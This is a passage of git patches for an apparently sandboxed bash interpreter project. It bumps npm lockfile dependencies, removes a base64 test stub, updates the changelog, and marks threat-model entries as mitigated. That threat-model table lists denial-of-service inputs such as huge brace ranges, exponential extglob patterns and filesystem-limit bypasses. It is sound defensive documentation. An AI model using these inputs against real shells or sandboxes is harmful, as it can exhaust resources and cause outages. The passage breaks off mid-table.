"sha512-pXrQ4/4myQvjFFOAUmt5pWRrLEZR20gzIJD7MNdUH+5/S5nLI4ZRBo/SYKC6coaYj9pYTfQdBIzcs+3kfJ5uDA==", "dev": true, "license": "MIT", "dependencies": { diff --git a/examples/package.json b/examples/package.json index 89f3f6cf4..3bf7ff6b3 100644 --- a/examples/package.json +++ b/examples/package.json @@ -17,7 +17,7 @@ "zod": "^3" }, "overrides": { - "langsmith": "0.5.25", + "langsmith": "^0.6.0", "uuid": "14.0.0", "jsondiffpatch": ">=0.7.2" }, diff --git a/site/package-lock.json b/site/package-lock.json index ef32f9a9a..81dd66974 100644 --- a/site/package-lock.json +++ b/site/package-lock.json @@ -22,13 +22,13 @@ } }, "node_modules/@astrojs/check": { - "version": "0.9.8", - "resolved": "https://registry.npmjs.org/@astrojs/check/-/check-0.9.8.tgz", - "integrity": "sha512-LDng8446QLS5ToKjRHd3bgUdirvemVVExV7nRyJfW2wV36xuv7vDxwy5NWN9zqeSEDgg0Tv84sP+T3yEq+Zlkw==", + "version": "0.9.9", + "resolved": "https://registry.npmjs.org/@astrojs/check/-/check-0.9.9.tgz", + "integrity": "sha512-A5UW8uIuErLWEoRQvzgXpO1gTjUFtK8r7nU2Z7GewAMxUb7bPvpk11qaKKgxqXlHJWlAvaaxy+Xg28A6bmQ1Tg==", "dev": true, "license": "MIT", "dependencies": { - "@astrojs/language-server": "^2.16.5", + "@astrojs/language-server": "^2.16.7", "chokidar": "^4.0.3", "kleur": "^4.1.5", "yargs": "^17.7.2" @@ -37,7 +37,7 @@ "astro-check": "bin/astro-check.js" }, "peerDependencies": { - "typescript": "^5.0.0" + "typescript": "^5.0.0 || ^6.0.0" } }, "node_modules/@astrojs/compiler": { @@ -48,18 +48,18 @@ "license": "MIT" }, "node_modules/@astrojs/internal-helpers": { - "version": "0.8.0", - "resolved": "https://registry.npmjs.org/@astrojs/internal-helpers/-/internal-helpers-0.8.0.tgz", - "integrity": "sha512-J56GrhEiV+4dmrGLPNOl2pZjpHXAndWVyiVDYGDuw6MWKpBSEMLdFxHzeM/6sqaknw9M+HFfHZAcvi3OfT3D/w==", + "version": "0.9.1", + "resolved": "https://registry.npmjs.org/@astrojs/internal-helpers/-/internal-helpers-0.9.1.tgz", + "integrity": "sha512-1pWuARqYom/TzuU3+0ZugsTrKlUydWKuULmDqSMTuonY+9IRDUEGKX/8PXQ1nBxRq3w85uGtd9q9SXfqEldMIQ==", "license": "MIT", "dependencies": { - "picomatch": "^4.0.3" + "picomatch": "^4.0.4" } }, "node_modules/@astrojs/language-server": { - "version": "2.16.6", - "resolved": "https://registry.npmjs.org/@astrojs/language-server/-/language-server-2.16.6.tgz", - "integrity": "sha512-N990lu+HSFiG57owR0XBkr02BYMgiLCshLf+4QG4v6jjSWkBeQGnzqi+E1L08xFPPJ7eEeXnxPXGLaVv5pa4Ug==", + "version": "2.16.8", + "resolved": "https://registry.npmjs.org/@astrojs/language-server/-/language-server-2.16.8.tgz", + "integrity": "sha512-yg1pZF6hs9FaKr2fgXMOGbW7pDLgFexFjuhWilPAc8VybTU+WSnbfbhYaUL1exm6dAK4sM3aKXGcfVwss+HXbg==", "dev": true, "license": "MIT", "dependencies": { @@ -71,7 +71,7 @@ "@volar/language-server": "~2.4.28", "@volar/language-service": "~2.4.28", "muggle-string": "^0.4.1", - "tinyglobby": "^0.2.15", + "tinyglobby": "^0.2.16", "volar-service-css": "0.0.70", "volar-service-emmet": "0.0.70", "volar-service-html": "0.0.70", @@ -99,13 +99,13 @@ } }, "node_modules/@astrojs/markdown-remark": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/@astrojs/markdown-remark/-/markdown-remark-7.1.0.tgz", - "integrity": "sha512-P+HnCsu2js3BoTc8kFmu+E9gOcFeMdPris75g+Zl4sY8+bBRbSQV6xzcBDbZ27eE7yBGEGQoqjpChx+KJYIPYQ==", + "version": "7.1.2", + "resolved": "https://registry.npmjs.org/@astrojs/markdown-remark/-/markdown-remark-7.1.2.tgz", + "integrity": "sha512-caXZ4Dc2St2dW8luEg22GlP0gupLdztCTQE4EzZOxW1pqWXz9mbeJEuHUkgDYcKWW8tjIHkydYDhWLVoxJ327Q==", "license": "MIT", "dependencies": { - "@astrojs/internal-helpers": "0.8.0", - "@astrojs/prism": "4.0.1", + "@astrojs/internal-helpers": "0.9.1", + "@astrojs/prism": "4.0.2", "github-slugger": "^2.0.0", "hast-util-from-html": "^2.0.3", "hast-util-to-text": "^4.0.2", @@ -128,9 +128,9 @@ } }, "node_modules/@astrojs/prism": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@astrojs/prism/-/prism-4.0.1.tgz", - "integrity": "sha512-nksZQVjlferuWzhPsBpQ1JE5XuKAf1id1/9Hj4a9KG4+ofrlzxUUwX4YGQF/SuDiuiGKEnzopGOt38F3AnVWsQ==", + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@astrojs/prism/-/prism-4.0.2.tgz", + "integrity": "sha512-KTivpmnz6lDsC6o9H4+DNm2SrE/GHzw8cNAvEJwAvUT+eoaEnn/4NtbDNfRRaxaJHdp15gf+tfHAWiXR4wB3BA==", "license": "MIT", "dependencies": { "prismjs": "^1.30.0" @@ -151,13 +151,12 @@ } }, "node_modules/@astrojs/telemetry": { - "version": "3.3.1", - "resolved": "https://registry.npmjs.org/@astrojs/telemetry/-/telemetry-3.3.1.tgz", - "integrity": "sha512-7fcIxXS9J4ls5tr8b3ww9rbAIz2+HrhNJYZdkAhhB4za/I5IZ/60g+Bs8q7zwG0tOIZfNB4JWhVJ1Qkl/OrNCw==", + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/@astrojs/telemetry/-/telemetry-3.3.2.tgz", + "integrity": "sha512-j8DNruA8ors99Al39RYZPJK4DC1bKkoNm93mAMuBhY9TCNC4R8n1q7ovFnJ5qhGh5Lsh7pa1gpQVpYpsJPeTHQ==", "license": "MIT", "dependencies": { "ci-info": "^4.4.0", - "dlv": "^1.1.3", "dset": "^3.1.4", "is-docker": "^4.0.0", "is-wsl": "^3.1.1", @@ -447,6 +446,7 @@ "version": "1.10.0", "resolved": "https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz", "integrity": "sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA==", + "dev": true, "license": "MIT", "optional": true, "dependencies": { @@ -886,6 +886,7 @@ "cpu": [ "arm64" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -908,6 +909,7 @@ "cpu": [ "x64" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -930,6 +932,7 @@ "cpu": [ "arm64" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -946,6 +949,7 @@ "cpu": [ "x64" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -962,6 +966,7 @@ "cpu": [ "arm" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -978,6 +983,7 @@ "cpu": [ "arm64" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -994,6 +1000,7 @@ "cpu": [ "ppc64" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -1010,6 +1017,7 @@ "cpu": [ "riscv64" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -1026,6 +1034,7 @@ "cpu": [ "s390x" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -1042,6 +1051,7 @@ "cpu": [ "x64" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -1058,6 +1068,7 @@ "cpu": [ "arm64" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -1074,6 +1085,7 @@ "cpu": [ "x64" ], + "dev": true, "license": "LGPL-3.0-or-later", "optional": true, "os": [ @@ -1090,6 +1102,7 @@ "cpu": [ "arm" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -1112,6 +1125,7 @@ "cpu": [ "arm64" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -1134,6 +1148,7 @@ "cpu": [ "ppc64" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -1156,6 +1171,7 @@ "cpu": [ "riscv64" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -1178,6 +1194,7 @@ "cpu": [ "s390x" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -1200,6 +1217,7 @@ "cpu": [ "x64" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -1222,6 +1240,7 @@ "cpu": [ "arm64" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -1244,6 +1263,7 @@ "cpu": [ "x64" ], + "dev": true, "license": "Apache-2.0", "optional": true, "os": [ @@ -1266,6 +1286,7 @@ "cpu": [ "wasm32" ], + "dev": true, "license": "Apache-2.0 AND LGPL-3.0-or-later AND MIT", "optional": true, "dependencies": { @@ -1285,6 +1306,7 @@ "cpu": [ "arm64" ], + "dev": true, "license": "Apache-2.0 AND LGPL-3.0-or-later", "optional": true, "os": [ @@ -1304,6 +1326,7 @@ "cpu": [ "ia32" ], + "dev": true, "license": "Apache-2.0 AND LGPL-3.0-or-later", "optional": true, "os": [ @@ -1323,6 +1346,7 @@ "cpu": [ "x64" ], + "dev": true, "license": "Apache-2.0 AND LGPL-3.0-or-later", "optional": true, "os": [ @@ -2033,6 +2057,13 @@ "vscode-uri": "^3.0.8" } }, + "node_modules/@vscode/emmet-helper/node_modules/jsonc-parser": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/jsonc-parser/-/jsonc-parser-2.3.1.tgz", + "integrity": "sha512-H8jvkz1O50L3dMZCsLqiuB2tA7muqbSg1AtGEkN0leAqGjsUzDJir3Zwr02BhqdcITPg3ei3mZ+HjMocAknhhg==", + "dev": true, + "license": "MIT" + }, "node_modules/@vscode/l10n": { "version": "0.0.18", "resolved": "https://registry.npmjs.org/@vscode/l10n/-/l10n-0.0.18.tgz", @@ -2041,9 +2072,9 @@ "license": "MIT" }, "node_modules/ajv": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.18.0.tgz", - "integrity": "sha512-PlXPeEWMXMZ7sPYOHqmDyCJzcfNrUr3fGNKtezX14ykXOEIvyK81d+qydx89KY5O71FKMPaQ2vBfBFI5NHR63A==", + "version": "8.20.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.20.0.tgz", + "integrity": "sha512-Thbli+OlOj+iMPYFBVBfJ3OmCAnaSyNn4M1vz9T6Gka5Jt9ba/HIR56joy65tY6kx/FCF5VXNB819Y7/GUrBGA==", "dev": true, "license": "MIT", "dependencies": { @@ -2155,15 +2186,15 @@ } }, "node_modules/astro": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/astro/-/astro-6.1.8.tgz", - "integrity": "sha512-6fT9M12U3fpi13DiPavNKDIoBflASTSxmKTEe+zXhWtlebQuOqfOnIrMWyRmlXp+mgDsojmw+fVFG9LUTzKSog==", + "version": "6.3.3", + "resolved": "https://registry.npmjs.org/astro/-/astro-6.3.3.tgz", + "integrity": "sha512-wvLIZQYbBZt6U8gyflBW4SLBypaqdwLZUH93rT3oT53cmQ0bTGubvMAGjqBRoheOYzYcTJZtW6czztzbu4kQ5g==", "license": "MIT", "dependencies": { - "@astrojs/compiler": "^3.0.1", - "@astrojs/internal-helpers": "0.8.0", - "@astrojs/markdown-remark": "7.1.0", - "@astrojs/telemetry": "3.3.1", + "@astrojs/compiler": "^4.0.0", + "@astrojs/internal-helpers": "0.9.1", + "@astrojs/markdown-remark": "7.1.2", + "@astrojs/telemetry": "3.3.2", "@capsizecss/unpack": "^4.0.0", "@clack/prompts": "^1.1.0", "@oslojs/encoding": "^1.1.0", @@ -2181,10 +2212,12 @@ "esbuild": "^0.27.3", "flattie": "^1.1.1", "fontace": "~0.4.1", + "get-tsconfig": "5.0.0-beta.4", "github-slugger": "^2.0.0", "html-escaper": "3.0.3", "http-cache-semantics": "^4.2.0", "js-yaml": "^4.1.1", + "jsonc-parser": "^3.3.1", "magic-string": "^0.30.21", "magicast": "^0.5.2", "mrmime": "^2.0.1", @@ -2194,7 +2227,7 @@ "p-queue": "^9.1.0", "package-manager-detector": "^1.6.0", "piccolore": "^0.1.3", - "picomatch": "^4.0.3", + "picomatch": "^4.0.4", "rehype": "^13.0.2", "semver": "^7.7.4", "shiki": "^4.0.2", @@ -2203,13 +2236,12 @@ "tinyclip": "^0.1.12", "tinyexec": "^1.0.4", "tinyglobby": "^0.2.15", - "tsconfck": "^3.1.6", "ultrahtml": "^1.6.0", "unifont": "~0.7.4", "unist-util-visit": "^5.1.0", - "unstorage": "^1.17.4", + "unstorage": "^1.17.5", "vfile": "^6.0.3", - "vite": "^7.3.1", + "vite": "^7.3.2", "vitefu": "^1.1.2", "xxhash-wasm": "^1.1.0", "yargs-parser": "^22.0.0", @@ -2232,9 +2264,9 @@ } }, "node_modules/astro/node_modules/@astrojs/compiler": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@astrojs/compiler/-/compiler-3.0.1.tgz", - "integrity": "sha512-z97oYbdebO5aoWzuJ/8q5hLK232+17KcLZ7cJ8BCWk6+qNzVxn/gftC0KzMBUTD8WAaBkPpNSQK6PXLnNrZ0CA==", + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@astrojs/compiler/-/compiler-4.0.0.tgz", + "integrity": "sha512-eouss7G8ygdZqHuke033VMcVw5HTZUu+PXd/h06DGDUg/jt5btPYPqh66ENWw/mU78rBrf/oeC4oqoBwMtDMNA==", "license": "MIT" }, "node_modules/axobject-query": { @@ -2576,9 +2608,9 @@ } }, "node_modules/devalue": { - "version": "5.7.1", - "resolved": "https://registry.npmjs.org/devalue/-/devalue-5.7.1.tgz", - "integrity": "sha512-MUbZ586EgQqdRnC4yDrlod3BEdyvE4TapGYHMW2CiaW+KkkFmWEFqBUaLltEZCGi0iFXCEjRF0OjF0DV2QHjOA==", + "version": "5.8.1", + "resolved": "https://registry.npmjs.org/devalue/-/devalue-5.8.1.tgz", + "integrity": "sha512-4CXDYRBGqN+57wVJkuXBYmpAVUSg3L6JAQa/DFqm238G73E1wuyc/JhGQJzN7vUf/CMphYau2zXbfWzDR5aTEw==", "license": "MIT" }, "node_modules/devlop": { @@ -2603,12 +2635,6 @@ "node": ">=0.3.1" } }, - "node_modules/dlv": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz", - "integrity": "sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA==", - "license": "MIT" - }, "node_modules/dom-serializer": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz", @@ -2841,9 +2867,9 @@ } }, "node_modules/fast-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.1.0.tgz", - "integrity": "sha512-iPeeDKJSWf4IEOasVVrknXpaBV0IApz/gp7S2bb7Z4Lljbl2MGJRqInZiUrQwV16cpzw/D3S5j5Julj/gT52AA==", + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.1.2.tgz", + "integrity": "sha512-rVjf7ArG3LTk+FS6Yw81V1DLuZl1bRbNrev6Tmd/9RaroeeRRJhAt7jg/6YFxbvAQXUCavSoZhPPj6oOx+5KjQ==", "dev": true, "funding": [ { @@ -2937,6 +2963,21 @@ "node": "6.* || 8.* || >= 10.*" } }, + "node_modules/get-tsconfig": { + "version": "5.0.0-beta.4", + "resolved": "https://registry.npmjs.org/get-tsconfig/-/get-tsconfig-5.0.0-beta.4.tgz", + "integrity": "sha512-7nF7C9fIPFEMHgEMEfgIlO9wDdZ8CyHw27rWciFZfHvHDReIiPhsYuzPRXsfvBCqFy1l8RRyyWV7QLM+ZhUJsQ==", + "license": "MIT", + "dependencies": { + "resolve-pkg-maps": "^1.0.0" + }, + "engines": { + "node": ">=20.20.0" + }, + "funding": { + "url": "https://github.com/privatenumber/get-tsconfig?sponsor=1" + } + }, "node_modules/github-slugger": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/github-slugger/-/github-slugger-2.0.0.tgz", @@ -3273,10 +3314,9 @@ "license": "MIT" }, "node_modules/jsonc-parser": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/jsonc-parser/-/jsonc-parser-2.3.1.tgz", - "integrity": "sha512-H8jvkz1O50L3dMZCsLqiuB2tA7muqbSg1AtGEkN0leAqGjsUzDJir3Zwr02BhqdcITPg3ei3mZ+HjMocAknhhg==", - "dev": true, + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/jsonc-parser/-/jsonc-parser-3.3.1.tgz", + "integrity": "sha512-HUgH65KyejrUFPvHFPbqOY0rsFip3Bo5wb4ngvdi1EpCYWUQDC5V+Y7mZws+DLkr4M//zQJoanu1SP+87Dv1oQ==", "license": "MIT" }, "node_modules/kleur": { @@ -4276,18 +4316,18 @@ "license": "MIT" }, "node_modules/oniguruma-parser": { - "version": "0.12.1", - "resolved": "https://registry.npmjs.org/oniguruma-parser/-/oniguruma-parser-0.12.1.tgz", - "integrity": "sha512-8Unqkvk1RYc6yq2WBYRj4hdnsAxVze8i7iPfQr8e4uSP3tRv0rpZcbGUDvxfQQcdwHt/e9PrMvGCsa8OqG9X3w==", + "version": "0.12.2", + "resolved": "https://registry.npmjs.org/oniguruma-parser/-/oniguruma-parser-0.12.2.tgz", + "integrity": "sha512-6HVa5oIrgMC6aA6WF6XyyqbhRPJrKR02L20+2+zpDtO5QAzGHAUGw5TKQvwi5vctNnRHkJYmjAhRVQF2EKdTQw==", "license": "MIT" }, "node_modules/oniguruma-to-es": { - "version": "4.3.5", - "resolved": "https://registry.npmjs.org/oniguruma-to-es/-/oniguruma-to-es-4.3.5.tgz", - "integrity": "sha512-Zjygswjpsewa0NLTsiizVuMQZbp0MDyM6lIt66OxsF21npUDlzpHi1Mgb/qhQdkb+dWFTzJmFbEWdvZgRho8eQ==", + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/oniguruma-to-es/-/oniguruma-to-es-4.3.6.tgz", + "integrity": "sha512-csuQ9x3Yr0cEIs/Zgx/OEt9iBw9vqIunAPQkx19R/fiMq2oGVTgcMqO/V3Ybqefr1TBvosI6jU539ksaBULJyA==", "license": "MIT", "dependencies": { - "oniguruma-parser": "^0.12.1", + "oniguruma-parser": "^0.12.2", "regex": "^6.1.0", "regex-recursion": "^6.0.2" } @@ -4692,6 +4732,15 @@ "node": ">=0.10.0" } }, + "node_modules/resolve-pkg-maps": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/resolve-pkg-maps/-/resolve-pkg-maps-1.0.0.tgz", + "integrity": "sha512-seS2Tj26TBVOC2NIc2rOe2y2ZO7efxITtLZcGSOnHHNOQ7CkiUBfw0Iw2ck6xkIhPwLhKNLS8BO+hEpngQlqzw==", + "license": "MIT", + "funding": { + "url": "https://github.com/privatenumber/resolve-pkg-maps?sponsor=1" + } + }, "node_modules/retext": { "version": "9.0.0", "resolved": "https://registry.npmjs.org/retext/-/retext-9.0.0.tgz", @@ -5099,30 +5148,11 @@ "url": "https://github.com/sponsors/wooorm" } }, - "node_modules/tsconfck": { - "version": "3.1.6", - "resolved": "https://registry.npmjs.org/tsconfck/-/tsconfck-3.1.6.tgz", - "integrity": "sha512-ks6Vjr/jEw0P1gmOVwutM3B7fWxoWBL2KRDb1JfqGVawBmO5UsvmWOQFGHBPl5yxYz4eERr19E6L7NMv+Fej4w==", - "license": "MIT", - "bin": { - "tsconfck": "bin/tsconfck.js" - }, - "engines": { - "node": "^18 || >=20" - }, - "peerDependencies": { - "typescript": "^5.0.0" - }, - "peerDependenciesMeta": { - "typescript": { - "optional": true - } - } - }, "node_modules/tslib": { "version": "2.8.1", "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", + "dev": true, "license": "0BSD", "optional": true }, @@ -5137,7 +5167,7 @@ "version": "5.9.3", "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.9.3.tgz", "integrity": "sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw==", - "devOptional": true, + "dev": true, "license": "Apache-2.0", "bin": { "tsc": "bin/tsc", @@ -5799,13 +5829,6 @@ "npm": ">=7.0.0" } }, - "node_modules/vscode-json-languageservice/node_modules/jsonc-parser": { - "version": "3.3.1", - "resolved": "https://registry.npmjs.org/jsonc-parser/-/jsonc-parser-3.3.1.tgz", - "integrity": "sha512-HUgH65KyejrUFPvHFPbqOY0rsFip3Bo5wb4ngvdi1EpCYWUQDC5V+Y7mZws+DLkr4M//zQJoanu1SP+87Dv1oQ==", - "dev": true, - "license": "MIT" - }, "node_modules/vscode-jsonrpc": { "version": "8.2.0", "resolved": "https://registry.npmjs.org/vscode-jsonrpc/-/vscode-jsonrpc-8.2.0.tgz", From 1198205aa5486aa1a0d27b800d81df308cac6d40 Mon Sep 17 00:00:00 2001 From: Mykhailo Chalyi Date: Sun, 17 May 2026 05:15:31 +0000 Subject: [PATCH 4/7] test(skills): drop Base64Stub now that real base64 builtin exists Issue #287 (add base64 builtin) is closed and `base64` is registered in the default builtins macro, so the stub override in skills_tests is no longer needed. The 19 skills tests still pass against the real builtin. --- crates/bashkit/tests/skills_tests.rs | 22 ---------------------- 1 file changed, 22 deletions(-) diff --git a/crates/bashkit/tests/skills_tests.rs b/crates/bashkit/tests/skills_tests.rs index 599fa866d..b3dae82bc 100644 --- a/crates/bashkit/tests/skills_tests.rs +++ b/crates/bashkit/tests/skills_tests.rs @@ -197,27 +197,6 @@ impl Builtin for StatStub { } } -/// Stub for `base64` — missing builtin, stub so scripts don't fail. -/// TODO: Remove when #287 (base64 builtin) is implemented. -struct Base64Stub; - -#[async_trait] -impl Builtin for Base64Stub { - async fn execute(&self, ctx: BuiltinContext<'_>) -> bashkit::Result { - // For testing: just return a fixed base64-url-safe string - if ctx.args.first().map(|s| s.as_str()) == Some("-d") { - // decode mode - let input = ctx.stdin.unwrap_or(""); - Ok(ExecResult::ok(input.to_string())) - } else { - // encode mode — return a fixed encoded value - Ok(ExecResult::ok( - "dTIwZjlhNzNkYTRhNzRiNjM5ODNlZmViYzdiYjZm\n".to_string(), - )) - } - } -} - // --------------------------------------------------------------------------- // Helper: write script to VFS and make executable // --------------------------------------------------------------------------- @@ -246,7 +225,6 @@ fn bash_with_stubs() -> Bash { .builtin("curl", Box::new(CurlStub)) .builtin("python3", Box::new(Python3Stub)) .builtin("stat", Box::new(StatStub)) - .builtin("base64", Box::new(Base64Stub)) .builtin("keytool", Box::new(EchoStub { name: "keytool" })) .builtin("openssl", Box::new(EchoStub { name: "openssl" })) .build() From 20c4c79030d1d75122c7c51f42fb395cbe63c3d4 Mon Sep 17 00:00:00 2001 From: Mykhailo Chalyi Date: Sun, 17 May 2026 05:22:11 +0000 Subject: [PATCH 5/7] docs: sync threat-model status with spec and populate Unreleased changelog MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - crates/bashkit/docs/threat-model.md: 59 entries previously marked **OPEN** or UNMITIGATED that the spec already records as **MITIGATED** are updated to match (TM-DOS-035-040, TM-DOS-045-048, TM-DOS-029/031/ 032/041-044/050-052/054/056/058, TM-ESC-012/013, TM-INF-015-017, etc.). TM-DOS-057 follows the spec by becoming **PARTIAL** (sleep timeout is WASM-only gap). TM-INF-018 stays **OPEN** — the spec marks it as NEEDED rather than MITIGATED. Closes the drift called out in the v0.6.0 changelog ("the final 6 OPEN entries are now marked mitigated"). - CHANGELOG.md: populate empty Unreleased section with the three commits landed since v0.6.0 (interpreter fuzz fix, JS dependabot bumps, specs housekeeping). --- CHANGELOG.md | 9 +++ crates/bashkit/docs/threat-model.md | 118 ++++++++++++++-------------- 2 files changed, 68 insertions(+), 59 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index f8f0f3d29..d711b739f 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -2,6 +2,15 @@ ## [Unreleased] +### Fixed + +* fix(interpreter): reject ${#name[…} without closing bracket in arithmetic +* fix(deps): resolve dependabot alerts in JS/TS workspaces + +### Documentation + +* chore(specs): drop resolved deferred items and add credential-injection to AGENTS.md + ## [0.6.0] - 2026-05-16 ### Highlights diff --git a/crates/bashkit/docs/threat-model.md b/crates/bashkit/docs/threat-model.md index ce8fff4c6..63ba886ce 100644 --- a/crates/bashkit/docs/threat-model.md +++ b/crates/bashkit/docs/threat-model.md @@ -50,16 +50,16 @@ through configurable limits. | Many dir entries (TM-DOS-014) | 1M files in one dir | `max_file_count` | MITIGATED | | Unicode path attacks (TM-DOS-015) | RTL override in filename | `validate_path()` rejects control/bidi chars | MITIGATED | | TOCTOU append (TM-DOS-034) | Concurrent appends bypass limits | Single write lock | **FIXED** | -| OverlayFs upper-only check (TM-DOS-035) | `check_write_limits()` ignores lower layer | Combined limit accounting | **OPEN** | -| OverlayFs double-count (TM-DOS-036) | `compute_usage()` counts overwritten files | Subtract overrides | **OPEN** | -| OverlayFs chmod CoW bypass (TM-DOS-037) | chmod writes to unlimited upper | Route through `check_write_limits()` | **OPEN** | -| OverlayFs incomplete whiteout (TM-DOS-038) | `rm -r` misses lower children | Check ancestor whiteouts | **OPEN** | -| Missing validate_path (TM-DOS-039) | VFS methods skip path checks | Add to all methods | **OPEN** | -| 32-bit truncation (TM-DOS-040) | `u64 as usize` on 32-bit | `usize::try_from()` | **OPEN** | -| OverlayFs symlink bypass (TM-DOS-045) | Unlimited symlink creation | Add `check_write_limits()` | **OPEN** | -| MountableFs no validation (TM-DOS-046) | Mounted FS skips `validate_path()` | Add to all methods | **OPEN** | -| Copy skip limit check (TM-DOS-047) | Copy overwrites without limit check | Always `check_write_limits()` | **OPEN** | -| Rename overwrites dirs (TM-DOS-048) | File over directory orphans children | Reject per POSIX | **OPEN** | +| OverlayFs upper-only check (TM-DOS-035) | `check_write_limits()` ignores lower layer | Combined limit accounting | **MITIGATED** | +| OverlayFs double-count (TM-DOS-036) | `compute_usage()` counts overwritten files | Subtract overrides | **MITIGATED** | +| OverlayFs chmod CoW bypass (TM-DOS-037) | chmod writes to unlimited upper | Route through `check_write_limits()` | **MITIGATED** | +| OverlayFs incomplete whiteout (TM-DOS-038) | `rm -r` misses lower children | Check ancestor whiteouts | **MITIGATED** | +| Missing validate_path (TM-DOS-039) | VFS methods skip path checks | Add to all methods | **MITIGATED** | +| 32-bit truncation (TM-DOS-040) | `u64 as usize` on 32-bit | `usize::try_from()` | **MITIGATED** | +| OverlayFs symlink bypass (TM-DOS-045) | Unlimited symlink creation | Add `check_write_limits()` | **MITIGATED** | +| MountableFs no validation (TM-DOS-046) | Mounted FS skips `validate_path()` | Add to all methods | **MITIGATED** | +| Copy skip limit check (TM-DOS-047) | Copy overwrites without limit check | Always `check_write_limits()` | **MITIGATED** | +| Rename overwrites dirs (TM-DOS-048) | File over directory orphans children | Reject per POSIX | **MITIGATED** | **Loops and CPU:** @@ -91,22 +91,22 @@ through configurable limits. | Parser hang (TM-DOS-024) | Malformed input | `parser_timeout` + `max_parser_operations` | MITIGATED | | Diff DoS (TM-DOS-028) | `diff` on large unrelated files | LCS matrix cap (10M cells) | MITIGATED | | Parser limit bypass (TM-DOS-030) | eval/source ignore limits | `Parser::with_limits()` | **FIXED** | -| Arithmetic overflow (TM-DOS-029) | `$(( 2 ** -1 ))` | Use wrapping arithmetic | **OPEN** | -| ExtGlob blowup (TM-DOS-031) | `+(a\|aa)` exponential | Add depth limit | **OPEN** | -| Tokio runtime exhaustion (TM-DOS-032) | Rapid `execute_sync()` calls | Shared runtime | **OPEN** | -| Brace range OOM (TM-DOS-041) | `{1..999999999}` | Cap range size | **OPEN** | -| Brace combinatorial (TM-DOS-042) | `{1..100}{1..100}{1..100}` | Cap total expansion | **OPEN** | -| Compound assign overflow (TM-DOS-043) | `((x+=1))` with x=i64::MAX | `wrapping_*` ops | **OPEN** | -| Lexer stack overflow (TM-DOS-044) | ~50 nested `$()` in quotes | Depth tracking | **OPEN** | -| parse_word_string limits (TM-DOS-050) | Parameter expansion ignores limits | Propagate limits | **OPEN** | -| YAML parser recursion (TM-DOS-051) | Deeply nested YAML stack overflow | Add depth limit | **OPEN** | -| Template engine recursion (TM-DOS-052) | Nested `{{#if}}`/`{{#each}}` overflow | Add depth limit | **OPEN** | +| Arithmetic overflow (TM-DOS-029) | `$(( 2 ** -1 ))` | Use wrapping arithmetic | **MITIGATED** | +| ExtGlob blowup (TM-DOS-031) | `+(a\|aa)` exponential | Add depth limit | **MITIGATED** | +| Tokio runtime exhaustion (TM-DOS-032) | Rapid `execute_sync()` calls | Shared runtime | **MITIGATED** | +| Brace range OOM (TM-DOS-041) | `{1..999999999}` | Cap range size | **MITIGATED** | +| Brace combinatorial (TM-DOS-042) | `{1..100}{1..100}{1..100}` | Cap total expansion | **MITIGATED** | +| Compound assign overflow (TM-DOS-043) | `((x+=1))` with x=i64::MAX | `wrapping_*` ops | **MITIGATED** | +| Lexer stack overflow (TM-DOS-044) | ~50 